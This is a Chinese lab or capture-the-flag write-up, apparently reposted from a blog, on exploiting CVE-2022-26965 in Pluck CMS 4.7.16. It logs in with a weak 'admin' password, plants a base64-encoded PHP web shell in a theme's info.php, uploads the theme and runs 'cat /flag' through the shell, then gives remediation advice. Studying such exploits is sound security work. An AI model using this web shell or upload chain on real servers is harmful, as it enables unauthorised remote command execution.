码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 利用cms主题构造木马(CVE-2022-26965)


    简介

    CVE-2022-26965是Pluck CMS 4.7.16版本存在一个远程shell上传执行漏洞。

    攻击者可利用此漏洞通过构造恶意的主题包进行上传并执行,未经授权访问服务器,造成潜在的安全隐患。

    过程

    1.打开环境,查看源码,发现login.php

    2.进入查看,登陆页面,弱口令admin进行登录,全英文界面,可以翻译的哈

    3.找到上传cms主题界面

    4.去github下载相对应的版本主题,随便下载一个就行

    https://github.com/billcreswell/redline-theme

    5.下载完成之后将文件里面的info.php里面的内容修改为下面的代码

    1. file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));
    2. ?>

    解释:使用file_put_contents函数将经过Base64解码后的字符串写入一个名为testshell.php的文件。

    6.修改好的文件进行上传

    文件上传成功。

    7.连接

    http://eci-2ze33y4rj8565dqp15iy.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag

    成功。

    解决方案

    这个漏洞的解决方案是升级Pluck CMS到最新版本或打上已知的修补程序。

    攻击者利用该漏洞一般会执行一些恶意代码,包括上传一些特定的主题包,然后执行一些远程命令,从而获取服务器的控制权限,因此升级或打上修补程序是解决该漏洞最直接有效的方法。

    除此之外,管理员还可以通过限制主题包的上传权限、对服务器进行安全扫描和加固等措施来提高系统的安全性。

  • 相关阅读:
    Mysql的备份回滚
    《QT从基础到进阶·二十六》绘制多个图形项(QGraphicsRectItem,QGraphicsLineItem,QGraphicsPolygonItem)
    javaweb JAVA JSP聊天室程序源码(局域网聊天系统 即时通讯)网页聊天系统
    QT+OSG/osgEarth编译之五十二:osgVolume+Qt编译(一套代码、一套框架,跨平台编译,版本:OSG-3.6.5工具库osgVolume)
    mybatis-plus-join
    Resultf风格接口
    【C++】多态 ⑫ ( 多继承 “ 弊端 “ | 多继承被禁用的场景 | 菱形继承结构的二义性 | 使用虚继承解决菱形继承结构的二义性 )
    Ubuntu22.04 LTS 显卡相关命令
    java推送数据到指定的外部接口
    【JavaWeb从零到一】会话技术Cookie&Session&JSP
  • 原文地址:https://blog.csdn.net/lkbzhj/article/details/132959040
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号